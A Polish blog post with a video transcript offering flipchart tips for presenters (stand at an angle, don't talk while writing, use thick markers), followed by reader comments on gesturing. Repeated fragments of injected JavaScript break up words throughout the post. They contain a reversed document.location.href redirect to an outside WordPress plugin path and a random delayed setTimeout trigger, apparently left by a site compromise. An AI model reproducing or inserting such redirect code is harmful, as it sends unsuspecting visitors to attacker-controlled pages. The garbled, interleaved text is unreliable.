Dzisiaj dwie porady toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotyczące korzystania z flipchartu lub tablicy, podczas prezentacji.
jeśli film Ci się spotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobał, kliknij “Lubię toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to” powyżej okna z filmem.
Transkrypt nagrania:
Dzisiaj mam dla Ciebie dwie porady jak pracować z flipchartem podczas prezentacji lub szkolenia.
1. Nie odwracaj się tyłem toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do publiczności, w czasie gdy piszesz coś na tablicy lub flipcharcie. W zależności czy jesteś prawo czy leworęczny powinieneś stanąć, odpowiednio, po lewej lub prawej stronie tablicy i pisać stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tojąc pod kątem około 45 stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topni toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do widzów. To taka pozycja “otwarta” na publiczność. Fatalnie wygląda sytuacja gdy odwracasz się plecami toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do witoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}downi i prezentujesz ludziom tył swojej marynarki albo garsonki.
2. Nie rób dwóch rzeczy na raz, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to znaczy nie mów i nie pisz równocześnie. Pisząc, zawsze jesteś lekko odwrócony od witoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}downi i jeśli nie masz mikrofonu Twój głos nie będzie słyszany przez wszystkich.
BONUSOWA porada dla wszystkich, którzy wolą czytać a nie oglądać 🙂 Tej porady nie ma na video!
Staraj się mieć przy sobie grube pisaki/markery.
po pierwsze, tekst lub rysunki będą lepiej witoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doczne.
po drugie, grubsza kreska robi lepsze wrażenie.
Pamiętaj, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobrzy mówcy używają najgrubszych, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dostępnych flamastrów!
Ja, niestety, nie miałem przy sobie takich markerów no i zobacz jaki jest efekt…. Moja wina!
pozdrawiam!
![]() |
Wpis Ci się podobał?
Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!
Bardzo cenne wskazówki. Jak zawsze diabeł tkwi w szczegółach, które składają się na całokształt prezentacji (wystąpienia).
Dziekuję i pozdrawiam,
Janusz
Januszu,
w kolejnych wpisach/filmach rozwinę wątek flipchartowy 🙂
Robert, takie filmy są idealnym połączeniem: krótkie, przydatne, życiowe i uniwersalne.
Dla mnie bomba!
Bartku,
a ja lubię takie komentarze: krótkie, konkretne i życzliwe dla autora bloga 🙂
Witam
Gdzie na Twoim forum można uzyskać informację dot. gestykulacji.
Powszechne stało sie używanie gestów jako koniecznego elementu prezentacji, jednak pomimo faktu że sam używam tego narzedzia, uważam że jest on nadużywany i sobiscie mnie bardzo irytuje. Wierze ze ta moda minie, na machanie rekami, krecenie kółeczek itd…oczywiscie sam tak robie ale jak patrze na siebie lub innych wydaje mi sie to sztuczne, nakrecone, czesto nie adekwatne do materiału, na pograniczu ADHD:)))
Obecnie każdy mówca zaczyna od nadpobudliwego ruchu rekami, a ja chciałby tego uniknąc. Wiem że to nie ten temat, stad proszę o wyrozumiałość
Pozdrawiam
Adamie,
komentarze są przeze mnie moderowane. Nie ingeruje w ich treść natomiast muszą poczekać aż je zaakceptuję 🙂
Jeśli chodzi o gestykulację, to jestem także przeciwnikiem nadmiernego machania kończynami. Nie chcemy być jak bohaterowie południowoamerykańskich seriali, którzy każde słowo podkreślają baaaardzo wymownym gestem. To też nie leży w temperamencie nas, Polaków, europejczyków w ogóle, no może poza Włochami 🙂
Skoro już mówię o temperamencie – nasza gestykulacja powinna mieć związek z naszym temperamentem, charakterem. jeśli jesteśmy spokojnymi, stonowanymi ludźmi, to nie możemy na scenie nagle przeistaczać się w wulkany energii i wyrzucać kończyny w różnych kierunkach z częstotliwością karabinu maszynowego. sami będziemy się z tym źle czuć.
co do gestykulacji podaję Ci dwa linki do wpisów na moim blogu:
Mowa ciała w wystąpieniach publicznych
tu mam jedną uwagę: piszę o podkreśleniu najważniejszego komunikatu i podniesieniu w tym momencie ręki z wyciągniętym palcem. sama pauza wystarczy, tak myślę z perspektywy czasu i doświadczeń 🙂
oraz
Gestykulacja podczas prezentacji
Tu masz jeszcze jeden artykuł:
https://tajnikiprezentacji.pl/praca-z-kamer/
pozdrawiam
Robert